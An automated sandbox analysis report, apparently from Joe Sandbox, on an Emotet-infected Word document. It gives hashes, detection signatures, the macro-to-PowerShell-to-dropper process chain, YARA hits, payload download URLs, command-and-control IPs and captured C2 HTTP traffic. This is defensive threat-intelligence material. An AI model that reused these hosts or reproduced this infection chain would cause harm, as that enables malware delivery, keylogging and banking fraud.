Analysis Report vU75ov9BQ4._doc

Overview

General Information

Sample Name: vU75ov9BQ4._doc (renamed file extension from _doc to doc)
Analysis ID: 269488
MD5: 23c58cef95a66fe76e9f8db34f206997
SHA1: 125030e070d57d12a4c5607816defb22100c010c
SHA256: 3d2acbb9d9a533e1a74f506659a1dac3b939475bb7b829a8838c712f2fbb5fd4

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Creates processes via WMI
Document contains an embedded VBA with many string operations indicating source code obfuscation
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 7076 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6152 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • X5cqpizh.exe (PID: 6316 cmdline: 'C:\Users\user\AppData\Local\Temp\X5cqpizh.exe' MD5: 9B4D022471DB4AE4520110C102320F2F)
      • rtm.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\wlidres\rtm.exe MD5: 9B4D022471DB4AE4520110C102320F2F)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4844 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20200818\PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xe5e:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xe5e:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xe5e:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e
C:\Users\user\Documents\20200818\PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt | JoeSecurity_EmotetDownloader | Yara detected Emotet Downloader | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.1297978189.00000000020A0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.1545894816.0000000000610000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.1298004241.00000000021C1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.1545921940.0000000000631000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Windows\SysWOW64\wlidres\rtm.exe | Code function: 4_2_00631D45 CryptDecodeObjectEx,4_2_00631D45
Source: C:\Users\user\AppData\Local\Temp\X5cqpizh.exe | Code function: 3_2_021C2887 FindNextFileW,FindFirstFileW,FindClose,3_2_021C2887
Source: C:\Windows\SysWOW64\wlidres\rtm.exe | Code function: 4_2_00632887 FindNextFileW,FindFirstFileW,FindClose,4_2_00632887
Source: global traffic | DNS query: name: eepvn.com
Source: global traffic | TCP traffic: 192.168.2.5:49744 -> 68.44.137.144:443
Source: global traffic | TCP traffic: 192.168.2.5:49741 -> 112.213.89.143:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.5:49744 -> 68.44.137.144:443
Source: global traffic | HTTP traffic detected:
  GET /con7ext_sym404/agbx_a2n7_pmie9uf/ HTTP/1.1
  Host: eepvn.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/ HTTP/1.1
  Referer: http://68.44.137.144/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/
  Content-Type: multipart/form-data; boundary=---------------------------485667106970012
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 68.44.137.144:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 68.44.137.144
Source: unknown | DNS traffic detected: queries for: eepvn.com
Source: unknown | HTTP traffic detected:
  POST /qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/ HTTP/1.1
  Referer: http://68.44.137.144/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/
  Content-Type: multipart/form-data; boundary=---------------------------485667106970012
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 68.44.137.144:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: rtm.exe, 00000004.00000002.1549374337.0000000002A1C000.00000004.00000001.sdmp, rtm.exe, 00000004.00000002.1549395932.0000000002A27000.00000004.00000001.sdmp | String found in binary or memory: http://68.44.137.144/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/
Source: rtm.exe, 00000004.00000002.1546077819.0000000000675000.00000004.00000020.sdmp | String found in binary or memory: http://68.44.137.144:443/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/
Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.dr | String found in binary or memory: http://cricfc.com/wp-admin/gmdmq_9w8l_ek/
Source: svchost.exe, 00000013.00000002.1548252652.00000205449B0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.dr | String found in binary or memory: http://eepvn.com/con7ext_sym404/agbx_a2n7_pmie9uf/
Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.dr | String found in binary or memory: http://elmpajohan.ir/cgi-bin/9zl_ji8bw_zdhad1j52/
Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.dr | String found in binary or memory: http://mjk-s.com.ua/wp-content/wr_pgu_kqegor6f/
Source: svchost.exe, 00000013.00000002.1548252652.00000205449B0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000013.00000002.1546063953.0000020543E87000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.dr | String found in binary or memory: https://havanmobile.vn/wp-admin/d5x_y_4uoweoinb/
Source: svchost.exe, 00000013.00000002.1548252652.00000205449B0000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: X5cqpizh.exe, 00000003.00000002.1297775729.00000000006EA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\X5cqpizh.exe | Code function: 3_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_00418A7C
Source: C:\Users\user\AppData\Local\Temp\X5cqpizh.exe | Code function: 3_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_00416DBB
Source: C:\Windows\SysWOW64\wlidres\rtm.exe | Code function: 4_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_00418A7C
Source: C:\Windows\SysWOW64\wlidres\rtm.exe | Code function: 4_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_00416DBB

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e 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
Yara detected Emotet
Source: Yara match | File source: 00000003.00000002.1297978189.00000000020A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1545894816.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1298004241.00000000021C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1545921940.0000000000631000.00000020.00000001.sdmp, type: MEMORY
Yara detected Emotet Downloader
Source: Yara match | File source: C:\Users\user\Documents\20200818\PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt, type: DROPPED

System Summary:

Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\X5cqpizh.exe
Very long command line found
Source: unknown | Process created: Commandline size = 2118